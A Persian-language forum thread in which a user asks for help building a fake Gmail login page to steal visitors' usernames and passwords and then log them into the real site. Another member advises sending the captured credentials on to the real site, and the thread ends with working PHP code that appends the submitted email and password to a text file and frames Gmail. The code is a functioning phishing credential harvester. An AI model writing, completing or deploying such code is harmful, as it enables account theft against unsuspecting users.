Php در html

n4r30s

New Member
سلام

من در حد کمی با html و php آشنا هستم خیلی کم . چند تا سوال پیش اومده اگه لطف کنن و دوستان راهنمایی کنن ممنون میشم .

من میخوام که در یک فایل html که یک فرم ورود یوزر و پسورد داره بعد از وارد کردن یوزر و پسورد توسط یک فایل php اونها ذخیره بشن و بعد ریدایرکت بشه به یک سایت دیگه و با همون اطلاعات یوزر و پسورد اتوماتیک لاگین کنه .

در واقع استفاده این در fake page عل هست یعنی ما یک فیک پیج مثلا از جی میل داریم طرف یوزر و پسورد رو وارد میکنه توسط یک فایل php که فراخوانی میشه سیو میشه بعد هم توی خود سایت جی میل لاگین بشه . البته اگر غیر از php راه آسونتری هم هست ممنون میشم که بفرمایید .

Mr.Steres

Active Member
توی HTML نمیشه از PHP استفاده کرد ! ولی میشه توی PHP از Html استفاده کرد ! در غیر این صورت می تونید ادرس Action رو توی فرم Html به یک ادرس php سند کنید ! توی فایل php هم که دیگه باید یک سری پردازش انجام داد ...

n4r30s

New Member
مشکل من همونه . من فایل پی اچ پی رو گذاشتم که یوزر و پسوردها رو سیو کنه . حالا باید چطوری برگردم به اچ تی ام ال و چطوری باید به سایت اصلی لاگین بشه ؟

آیا کسی میتونه کمک کنه که فیک پیچ رو با پی اچ پی درسته کنه کلا ؟

Mr.Steres

Active Member
شما باید علاوه بر سیو اون رو به سایت اصلی هم ارسال کنی دیگه ...نیازی به برگشت به صفحه html نیست .

n4r30s

New Member
mr.steres عزیز

مرسی از راهنماییت . من کد پی اچ پی رو اینجا می زارم و بطور نمونه برای فیک پیج جی میل هستش . میشه بفرمایید چطوری باید به سایت اصلی ارسال کنیم اینا رو ؟

PHP:
<?php  
$fp = fopen("g.txt", "a"); 
fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]\r\n"); 
echo "<HTML> 

<head> 
<FRAMESET cols=\"*\"> 
  <FRAME SRC=\"http://mail.google.com/mail\"> 

</FRAMESET>";?>

جدیدترین ارسال ها

بالا